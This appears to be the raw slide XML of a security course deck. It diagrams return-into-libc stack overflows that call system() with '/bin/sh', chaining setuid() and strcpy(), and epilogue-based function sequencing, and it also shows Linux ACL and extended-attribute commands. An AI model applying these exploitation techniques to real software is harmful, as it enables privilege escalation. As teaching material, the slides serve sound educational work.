              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>when </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> is </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>executed</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202218" name="Line 42"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6172200" y="131445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19" name="Line 43"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="8077200" y="131445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0" name="Line 44"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="8077200" y="20574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1" name="Line 45"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6172200" y="20574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2" name="Rectangle 46"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="61722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fake caller return address</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202223" name="Rectangle 47"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6172200" y="1485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a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>/bin/sh0</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202224" name="Line 48"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7086600" y="2000250"/>
            <a:ext cx="0" cy="4572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2227" name="Rectangle 51"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Return-into-libc Overflows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="ヒラギノ角ゴ Pro W3" charset="-128"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202228" name="Text Box 52"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6163441" y="2514600"/>
            <a:ext cx="1813317"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address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> believes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>it was called from</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202229" name="Freeform 53"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1981200" y="382905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a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1202230" name="Freeform 54"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="3829050"/>
            <a:ext cx="21336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64846024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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Executing Multiple Functions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205251" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="2914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5252" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="2628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5253" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="304800" y="320040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5254" name="Line 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="12192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55" name="Line 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="304800" y="14859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6" name="Line 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="2209800" y="14859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7" name="Line 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="22098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8" name="Line 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="3048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9" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="2914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5260" name="Rectangle 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="2628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setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205261" name="Rectangle 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="320040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5262" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="33528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63" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="24384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4" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="43434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5" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="43434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6" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="24384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7" name="Rectangle 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2438400" y="23431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5268" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="24384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69" name="Rectangle 21"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="24384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endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205273" name="Line 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="54864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74" name="Line 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="45720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5" name="Line 27"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="64770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6" name="Line 28"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6477000" y="26289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7" name="Line 29"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="4572000" y="26289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8" name="Rectangle 30"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="23431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5279" name="Rectangle 31"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="45720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80" name="Rectangle 32"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="45720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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205281" name="Line 33"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="76200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82" name="Line 34"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="67056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3" name="Line 35"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="86106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4" name="Line 36"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="8610600" y="2343150"/>
            <a:ext cx="0" cy="20002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5" name="Line 37"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipV="1">
            <a:off x="6705600" y="2343150"/>
            <a:ext cx="0" cy="20002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7" name="Rectangle 39"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="67056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88" name="Rectangle 40"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="67056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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205289" name="Line 41"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1" flipV="1">
            <a:off x="7620000" y="2286000"/>
            <a:ext cx="0" cy="4572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0" name="Text Box 42"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6705600" y="2800350"/>
            <a:ext cx="1813317"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address</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>system()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t> believes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>it was called from</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205291" name="Freeform 43"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="16764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2" name="Freeform 44"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="38100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3" name="Freeform 45"/>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="60198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4" name="Text Box 46"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1905000" y="4629150"/>
            <a:ext cx="925854" cy="276999"/>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Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205295" name="Text Box 47"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3505201" y="4686300"/>
            <a:ext cx="1690412" cy="276999"/>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original function’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1205296" name="Text Box 48"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6019800" y="4686300"/>
            <a:ext cx="1346492" cy="276999"/>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Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>setuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1376413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631F-188A-92FD-D82E-131BD3CCB115}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access Control Lists</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A26EBFC-25E9-F169-ED2E-23326E68E9B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>% touch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chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 600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getfacl</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owner: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group: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user::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rw</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other::---</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setfacl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -m </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>u:backup:r</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getfacl</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owner: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group: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user::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rw</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err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user:backup:r</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mask::r--</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other::---</a:t>
            </a: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endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{891BE291-8C5F-B783-0EA6-7F0150631265}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>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setfattr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user.comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -v "fighters!"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getfattr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> -d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err="1">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>user.comment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:ea typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Hack" panose="020B0609030202020204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="fighters!"</a:t>
            </a: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71214436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Grp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Executing Arbitrary Sequences of Functions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1207299" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Function chaining is limited by the size and number of parameters</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>By using as the fake return address the address of a function epilogue, it is possible to induce the application to adjust the stack before each execution</a:t>
            </a:r>
          </a:p>
          <a:p>
